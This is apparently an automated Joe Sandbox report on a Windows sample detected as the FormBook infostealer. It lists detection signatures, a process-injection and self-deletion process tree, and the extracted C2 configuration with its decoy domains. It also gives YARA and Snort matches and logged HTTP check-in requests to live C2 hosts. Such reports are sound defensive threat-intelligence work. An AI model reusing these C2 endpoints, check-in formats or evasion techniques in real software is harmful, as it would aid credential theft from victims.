Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tYEY1UeurGz0Mjb.exe

Overview

General Information

Sample name:tYEY1UeurGz0Mjb.exe
Analysis ID:1467706
MD5:a9c37f81cd9a181dab2262d2f8456a76
SHA1:549e7a8c8e998d3b7f85e61a7171685af231e780
SHA256:76650fb8aeaf679cd204ca347026a67767ab8d9c27f65597b275d8d57327e096
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • tYEY1UeurGz0Mjb.exe (PID: 4196 cmdline: "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe" MD5: A9C37F81CD9A181DAB2262D2F8456A76)
    • tYEY1UeurGz0Mjb.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe" MD5: A9C37F81CD9A181DAB2262D2F8456A76)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • wlanext.exe (PID: 3876 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)
          • cmd.exe (PID: 1788 cmdline: /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cpuk-finance.com/dy13/"], "decoy": ["manga-house.com", "kjsdhklssk51.xyz", "b0ba138.xyz", "bt365033.com", "ccbsinc.net", "mrwine.xyz", "nrxkrd527o.xyz", "hoshi.social", "1912ai.com", "serco2020.com", "byfchfyr.xyz", "imuschestvostorgov.online", "austinheafey.com", "mrdfa.club", "883106.photos", "profitablefxmarkets.com", "taini00.net", "brye.top", "ginsm.com", "sportglid.com", "hdretailllc.com", "umeshraja.com", "bum-arch.com", "carefulapp.com", "kjqlq.top", "3dsciagames.com", "520yhy.com", "magahatinu.com", "freedompopo.com", "directgaragedoor.com", "tyupok.xyz", "thecrystore.com", "camperelektrikde.shop", "soloparentconnect.com", "sonderfullcoaching.com", "jesuscrewofficial.com", "oioc.xyz", "assineunitv.com", "whysco.com", "484844.vip", "gdctus840t.top", "acc-pay.top", "bdsmnutzbar.info", "sdplat.media", "cioncarp4213.com", "facecasino2.top", "bankablebark.com", "gulerweb.online", "radheyranidailyproduct.com", "fin4d-sl.com", "northshorehousekeeping.com", "femmeteefatale.com", "d0ge6or54x07cfn.xyz", "craftwhirl.com", "kgfna.biz", "real-estate-96841.bond", "cfuhtkwo.xyz", "nestormediaproduction.com", "txglobedev.com", "kermoal.dev", "yr8gl32.vip", "bathroomremodelnearyou.today", "nearmeacupuncture.com", "chicstop.store"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Unusual Parent Process For Cmd.EXE
          Source: Process startedAuthor: Tim Rauch: Data: Command: /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe", CommandLine: /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\wlanext.exe", ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 3876, ParentProcessName: wlanext.exe, ProcessCommandLine: /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe", ProcessId: 1788, ProcessName: cmd.exe

          Snort Signatures

          Timestamp:07/04/24-16:34:26.175750
          SID:2031412
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/04/24-16:37:49.666946
          SID:2031412
          Source Port:49725
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/04/24-16:36:27.968302
          SID:2031412
          Source Port:49722
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/04/24-16:34:46.796764
          SID:2031412
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/04/24-16:35:46.877456
          SID:2031412
          Source Port:49720
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/04/24-16:35:26.166423
          SID:2031412
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/04/24-16:36:49.977451
          SID:2031412
          Source Port:49723
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/04/24-16:37:09.149461
          SID:2031412
          Source Port:49724
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/04/24-16:36:07.818487
          SID:2031412
          Source Port:49721
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/04/24-16:38:31.660414
          SID:2031412
          Source Port:49727
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/04/24-16:38:10.816088
          SID:2031412
          Source Port:49726
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cpuk-finance.com/dy13/"], "decoy": ["manga-house.com", "kjsdhklssk51.xyz", "b0ba138.xyz", "bt365033.com", "ccbsinc.net", "mrwine.xyz", "nrxkrd527o.xyz", "hoshi.social", "1912ai.com", "serco2020.com", "byfchfyr.xyz", "imuschestvostorgov.online", "austinheafey.com", "mrdfa.club", "883106.photos", "profitablefxmarkets.com", "taini00.net", "brye.top", "ginsm.com", "sportglid.com", "hdretailllc.com", "umeshraja.com", "bum-arch.com", "carefulapp.com", "kjqlq.top", "3dsciagames.com", "520yhy.com", "magahatinu.com", "freedompopo.com", "directgaragedoor.com", "tyupok.xyz", "thecrystore.com", "camperelektrikde.shop", "soloparentconnect.com", "sonderfullcoaching.com", "jesuscrewofficial.com", "oioc.xyz", "assineunitv.com", "whysco.com", "484844.vip", "gdctus840t.top", "acc-pay.top", "bdsmnutzbar.info", "sdplat.media", "cioncarp4213.com", "facecasino2.top", "bankablebark.com", "gulerweb.online", "radheyranidailyproduct.com", "fin4d-sl.com", "northshorehousekeeping.com", "femmeteefatale.com", "d0ge6or54x07cfn.xyz", "craftwhirl.com", "kgfna.biz", "real-estate-96841.bond", "cfuhtkwo.xyz", "nestormediaproduction.com", "txglobedev.com", "kermoal.dev", "yr8gl32.vip", "bathroomremodelnearyou.today", "nearmeacupuncture.com", "chicstop.store"]}
          Multi AV Scanner detection for submitted file
          Source: tYEY1UeurGz0Mjb.exeReversingLabs: Detection: 31%
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: tYEY1UeurGz0Mjb.exeJoe Sandbox ML: detected
          Source: tYEY1UeurGz0Mjb.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: tYEY1UeurGz0Mjb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: ZrEY.pdb source: tYEY1UeurGz0Mjb.exe
          Source: Binary string: wntdll.pdbUGP source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2048302242.000000000325A000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2050405696.000000000340F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: tYEY1UeurGz0Mjb.exe, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2048302242.000000000325A000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2050405696.000000000340F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2048827038.0000000001548000.00000004.00000020.00020000.00000000.sdmp, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2050066314.0000000001D10000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ZrEY.pdbSHA256 source: tYEY1UeurGz0Mjb.exe
          Source: Binary string: wlanext.pdbGCTL source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2048827038.0000000001548000.00000004.00000020.00020000.00000000.sdmp, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2050066314.0000000001D10000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 4x nop then jmp 0766A8A0h0_2_0766A059
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 4x nop then pop ebx3_2_00407B26
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx5_2_00BB7B26

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49716 -> 216.83.55.173:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 154.204.100.23:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 185.151.30.212:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 103.224.212.213:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49722 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49723 -> 128.1.131.130:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 103.8.70.95:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 91.195.240.123:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 23.227.38.74:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.213 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.151.30.212 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 128.1.131.130 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.204.100.23 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 216.83.55.173 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.8.70.95 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.cpuk-finance.com/dy13/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.cfuhtkwo.xyz
          Source: DNS query: www.mrwine.xyz
          Source: DNS query: www.byfchfyr.xyz
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=PvB4rkoJuXXI3XrovRSl0ulB4esZJCnJeomMIIs8xluNKDV17gKdZx+EfyXB3rEjLuJx&nL=S4247TXPfxsLR HTTP/1.1Host: www.yr8gl32.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=tpMAOJT8TtRMsuChjA4iw3MPbwbvajf92oh/j4Ngt5fu8FRpUZDvCuNqhi68G9U6kaV7&nL=S4247TXPfxsLR HTTP/1.1Host: www.cfuhtkwo.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=gDxxMnsI36st3zAAJ1+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPEu2QspRuVgT&nL=S4247TXPfxsLR HTTP/1.1Host: www.cpuk-finance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=COXK5yT9Xx7VrCeWTqQC1HikmuY3GWnRD5VN4SaGvnHzB3wzqzXgI63okZhLDtLx1kx2&nL=S4247TXPfxsLR HTTP/1.1Host: www.nearmeacupuncture.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=7H41Cx9M/9Klm4wO2KyYkeGFvajkB7bQdwjfmZPzOjV6ZXjzQq6V6P6jcCKZla+kGSS1&nL=S4247TXPfxsLR HTTP/1.1Host: www.serco2020.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=nOOUddImUTrWJ0TERE8yX7QbQXzFXI1eXPVGsAvMbd1lknBUetPROzpkz9KaJDttVL7t&nL=S4247TXPfxsLR HTTP/1.1Host: www.mrwine.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=VyXmaWdZl+jwWdNk+AMtKckYhqijILaYAxW34tQVDb7UqFANvgHXRuyONC1nPUdS4yTi&nL=S4247TXPfxsLR HTTP/1.1Host: www.cioncarp4213.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=I05FyvQRVtD1nBL3W879G3rrifn+JaBOl79MbsgbL3I2Ix0E6XOmXaYbAYxT8R6qOP2I&nL=S4247TXPfxsLR HTTP/1.1Host: www.520yhy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI&nL=S4247TXPfxsLR HTTP/1.1Host: www.txglobedev.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewIP Address: 103.224.212.213 103.224.212.213
          Source: Joe Sandbox ViewASN Name: SQUARESPACEUS SQUARESPACEUS
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewASN Name: UHGL-AS-APUCloudHKHoldingsGroupLimitedHK UHGL-AS-APUCloudHKHoldingsGroupLimitedHK
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 4_2_107D8F82 getaddrinfo,setsockopt,recv,4_2_107D8F82
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=PvB4rkoJuXXI3XrovRSl0ulB4esZJCnJeomMIIs8xluNKDV17gKdZx+EfyXB3rEjLuJx&nL=S4247TXPfxsLR HTTP/1.1Host: www.yr8gl32.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=tpMAOJT8TtRMsuChjA4iw3MPbwbvajf92oh/j4Ngt5fu8FRpUZDvCuNqhi68G9U6kaV7&nL=S4247TXPfxsLR HTTP/1.1Host: www.cfuhtkwo.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=gDxxMnsI36st3zAAJ1+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPEu2QspRuVgT&nL=S4247TXPfxsLR HTTP/1.1Host: www.cpuk-finance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=COXK5yT9Xx7VrCeWTqQC1HikmuY3GWnRD5VN4SaGvnHzB3wzqzXgI63okZhLDtLx1kx2&nL=S4247TXPfxsLR HTTP/1.1Host: www.nearmeacupuncture.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=7H41Cx9M/9Klm4wO2KyYkeGFvajkB7bQdwjfmZPzOjV6ZXjzQq6V6P6jcCKZla+kGSS1&nL=S4247TXPfxsLR HTTP/1.1Host: www.serco2020.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=nOOUddImUTrWJ0TERE8yX7QbQXzFXI1eXPVGsAvMbd1lknBUetPROzpkz9KaJDttVL7t&nL=S4247TXPfxsLR HTTP/1.1Host: www.mrwine.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=VyXmaWdZl+jwWdNk+AMtKckYhqijILaYAxW34tQVDb7UqFANvgHXRuyONC1nPUdS4yTi&nL=S4247TXPfxsLR HTTP/1.1Host: www.cioncarp4213.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=I05FyvQRVtD1nBL3W879G3rrifn+JaBOl79MbsgbL3I2Ix0E6XOmXaYbAYxT8R6qOP2I&nL=S4247TXPfxsLR HTTP/1.1Host: www.520yhy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy13/?IR=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI&nL=S4247TXPfxsLR HTTP/1.1Host: www.txglobedev.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.yr8gl32.vip
          Source: global trafficDNS traffic detected: DNS query: www.cfuhtkwo.xyz
          Source: global trafficDNS traffic detected: DNS query: www.cpuk-finance.com
          Source: global trafficDNS traffic detected: DNS query: www.nearmeacupuncture.com
          Source: global trafficDNS traffic detected: DNS query: www.serco2020.com
          Source: global trafficDNS traffic detected: DNS query: www.mrwine.xyz
          Source: global trafficDNS traffic detected: DNS query: www.cioncarp4213.com
          Source: global trafficDNS traffic detected: DNS query: www.520yhy.com
          Source: global trafficDNS traffic detected: DNS query: www.byfchfyr.xyz
          Source: global trafficDNS traffic detected: DNS query: www.txglobedev.com
          Source: global trafficDNS traffic detected: DNS query: www.whysco.com
          Source: global trafficDNS traffic detected: DNS query: www.jesuscrewofficial.com
